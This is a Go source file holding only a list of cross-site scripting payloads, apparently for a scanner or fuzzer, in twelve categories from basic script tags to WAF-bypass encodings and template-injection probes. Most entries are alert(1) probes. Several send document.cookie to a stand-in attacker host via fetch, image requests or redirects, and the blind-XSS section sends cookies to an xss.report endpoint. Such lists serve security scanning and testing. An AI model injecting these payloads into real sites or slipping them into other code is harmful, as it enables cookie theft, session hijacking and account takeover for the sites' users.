package main

var Payloads = []string{
	// === Category 1: Basic script injection ===
	"<script>alert(1)</script>",
	"<script>alert('XSS')</script>",
	"<script>alert(document.cookie)</script>",
	"<script>fetch('https://ev il.com/?c='+document.cookie)</script>",
	"<script>new Image().src='https://ev il.com/?c='+document.cookie</script>",
	"<script>document.location='https://ev il.com/?c='+document.cookie</script>",
	"<script src=https://ev il.com/xss.js></script>",
	"<script src=\"https://ev il.com/xss.js\"></script>",
	"<script>eval('al'+'ert(1)')</script>",
	"<script>document.write('XSS')</script>",
	"<script>window['al'+'ert'](1)</script>",

	// === Category 2: HTML event handlers ===
	"<img src=x onerror=alert(1)>",
	"<img src=x onerror=alert('XSS')>",
	"<img src=x onerror=alert(document.cookie)>",
	"<img src=x onerror=fetch('https://ev il.com/?c='+document.cookie)>",
	"<img src=x onerror=eval('al'+'ert(1)')>",
	"<img src=x onerror=prompt(1)>",
	"<img src=x onerror=confirm(1)>",
	"<img src=x onerror=document.location='https://ev il.com/?c='+document.cookie>",
	"<svg onload=alert(1)>",
	"<svg onload=alert('XSS')></svg>",
	"<svg onload=alert(document.cookie)></svg>",
	"<svg onload=fetch('https://ev il.com/?c='+document.cookie)></svg>",
	"<svg onload=eval('al'+'ert(1)')>",
	"<svg onload=prompt(1)>",
	"<svg onload=confirm(1)>",
	"<svg/onload=alert(1)>",
	"<body onload=alert(1)>",
	"<body onload=alert('XSS')>",
	"<body onload=fetch('https://ev il.com/?l='+location)>",
	"<body onpageshow=alert(1)>",
	"<body onfocus=alert(1) autofocus>",
	"<details open ontoggle=alert(1)>",
	"<details open ontoggle=alert('XSS')>",
	"<div onpointerenter=alert(1)>hover</div>",
	"<div onmouseover=alert(1)>hover</div>",
	"<div onclick=alert(1)>click</div>",
	"<button onclick=alert(1)>Click</button>",
	"<button onfocus=alert(1) autofocus>Click</button>",
	"<input onfocus=alert(1) autofocus>",
	"<input onfocus=alert('XSS') autofocus>",
	"<input onmouseover=alert(1)>",
	"<select onfocus=alert(1) autofocus>",
	"<textarea onfocus=alert(1) autofocus>",
	"<keygen onfocus=alert(1) autofocus>",
	"<marquee onstart=alert(1)>XSS</marquee>",
	"<marquee onstart=alert('XSS')>XSS</marquee>",
	"<x onmouseover=alert(1)>Hover</x>",
	"<x onmouseover=alert(document.domain)>Hover</x>",
	"<a onmouseover=alert(1)>hover</a>",
	"<video src=x onerror=alert(1)>",
	"<video src=x onerror=alert('XSS')>",
	"<video><source onerror=alert(1)>",
	"<audio src=x onerror=alert(1)>",
	"<audio><source onerror=alert(1)>",
	"<progress onprogress=alert(1)>",
	"<meter onmouseover=alert(1)>",

	// === Category 3: Attribute injection ===
	"\"><script>alert(1)</script>",
	"\"><script>alert('XSS')</script>",
	"\"><script>alert(document.cookie)</script>",
	"\"><img src=x onerror=alert(1)>",
	"\"><img src=x onerror=alert('XSS')>",
	"\"><svg onload=alert(1)>",
	"\"><svg onload=alert('XSS')>",
	"\"><iframe src=javascript:alert(1)>",
	"\"><iframe src=javascript:alert('XSS')>",
	"\"><body onload=alert(1)>",
	"\"><input onfocus=alert(1) autofocus>",
	"\"><details open ontoggle=alert(1)>",
	"\"><marquee onstart=alert(1)>",
	"\" autofocus onfocus=alert(1) x=\"",
	"\" onfocus=alert(1) autofocus=\"",
	"\" onmouseover=alert(1)  \"",
	"\" autofocus onfocus=alert(1) >",
	"'><script>alert(1)</script>",
	"'><img src=x onerror=alert(1)>",
	"'><svg onload=alert(1)>",
	"' autofocus onfocus=alert(1) '",

	// === Category 4: Breakout contexts ===
	"</textarea><script>alert(1)</script>",
	"</textarea><img src=x onerror=alert(1)>",
	"</style><script>alert(1)</script>",
	"</style><img src=x onerror=alert(1)>",
	"</title><script>alert(1)</script>",
	"</title><img src=x onerror=alert(1)>",
	"</noscript><script>alert(1)</script>",
	"<!--><script>alert(1)</script>",
	"--><script>alert(1)</script>",

	// === Category 5: URI / javascript: ===
	"<a href=\"javascript:alert(1)\">Click</a>",
	"<a href=\"javascript:alert('XSS')\">Click</a>",
	"<a href=\"javascript:alert(document.cookie)\">Click</a>",
	"<iframe src=javascript:alert(1)>",
	"<iframe src=javascript:alert('XSS')>",
	"<iframe src=javascript:alert(document.cookie)>",
	"<iframe src=\"javascript:alert(1)\">",
	"<iframe srcdoc=\"<script>alert(1)</script>\">",
	"<object data=javascript:alert(1)>",
	"<object data=\"javascript:alert(1)\">",
	"<embed src=javascript:alert(1)>",
	"<embed src=\"javascript:alert(1)\">",
	"<meta http-equiv=refresh content=\"0;url=javascript:alert(1)\">",
	"<form><button formaction=javascript:alert(1)>Click</form>",
	"<form><button formaction=\"javascript:alert(1)\">Click</form>",
	"<isindex type=submit value=Click action=javascript:alert(1)>",

	// === Category 6: Data URI / Base64 ===
	"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">",
	"<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\">",
	"<iframe src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">",
	"<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">",

	// === Category 7: Angular / Vue / React ===
	"{{constructor.constructor('alert(1)')()}}",
	"{{$on.constructor('alert(1)')()}}",
	"{{toString().constructor.prototype.charAt=[].join;$eval('x=1} }};alert(1);//')}}",
	"<div ng-app>{{$on.constructor('alert(1)')()}}</div>",
	"<input autofocus ng-focus=\"$event.view.alert(1)\">",
	"{{_=toString().constructor.prototype;_['c'+'onstructo'+'r']('alert(1)')()}}",

	// === Category 8: WAF bypasses ===
	"<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>",
	"<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;(1)>",
	"<img src=x onerror=\u0061\u006c\u0065\u0072\u0074(1)>",
	"<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
	"<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>",
	"<img src=x onerror=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000049&#0000041>",
	"<script>eval('\\x61\\x6c\\x65\\x72\\x74(1)')</script>",
	"<script>eval('\\u0061\\u006c\\u0065\\u0072\\u0074(1)')</script>",
	"<script>\u0061\u006c\u0065\u0072\u0074(1)</script>",
	"<a href=\"java\nscript:alert(1)\">Click</a>",
	"<a href=\"java\tscript:alert(1)\">Click</a>",
	"<a href=\"java\rscript:alert(1)\">Click</a>",

	// === Category 9: Polyglot / Mixed ===
	"\"--></style></script><img src=x onerror=alert(1)>",
	"\"'><img src=x onerror=alert(1)>",
	"\"/><img src=x onerror=alert(1)>",
	"</</script><script>alert(1)</script>",
	"<script>alert(1)</sc<script>ript>",
	"<scr<script>ipt>alert(1)</scr<script>ipt>",
	"<img src=x onerror=alert(1) <!--",
	"<img src=x onerror=alert(1) >",
	"<img src=x onerror=\"alert(1)\" \"",
	"<img src=x onerror=\"alert(1)\">",
	"<img src=1 onerror=alert(1)>",
	"<img/src=x onerror=alert(1)>",

	// === Category 10: DOM-based sinks ===
	"<script>document.write('<img src=x onerror=alert(1)>')</script>",
	"<script>document.writeln('<img src=x onerror=alert(1)>')</script>",
	"<script>document.body.innerHTML='<img src=x onerror=alert(1)>'</script>",
	"<script>eval(location.hash.slice(1))</script>",
	"<script>setTimeout('alert(1)',1)</script>",
	"<script>setInterval('alert(1)',1)</script>",
	"<script>new Function('alert(1)')()</script>",
	"<script>window.location='javascript:alert(1)'</script>",
	"<script>location.href='javascript:alert(1)'</script>",

	// === Category 11: Blind XSS ===
	"<script src=https://xss.report/abc></script>",
	"<img src=x onerror=\"new Image().src='https://xss.report/abc?c='+document.cookie\">",
	"<link rel=stylesheet href=https://xss.report/abc>",
	"<img src=\"https://xss.report/abc?\"+document.cookie>",
	"<script>fetch('https://xss.report/abc?c='+document.cookie)</script>",

	// === Category 12: Server-side template ===
	"${7*7}",
	"{{7*7}}",
	"<%= 7*7 %>",
	"#set($x=7*7)$x",
	"{{7*7|safe}}",
	"{% print(7*7) %}",
}
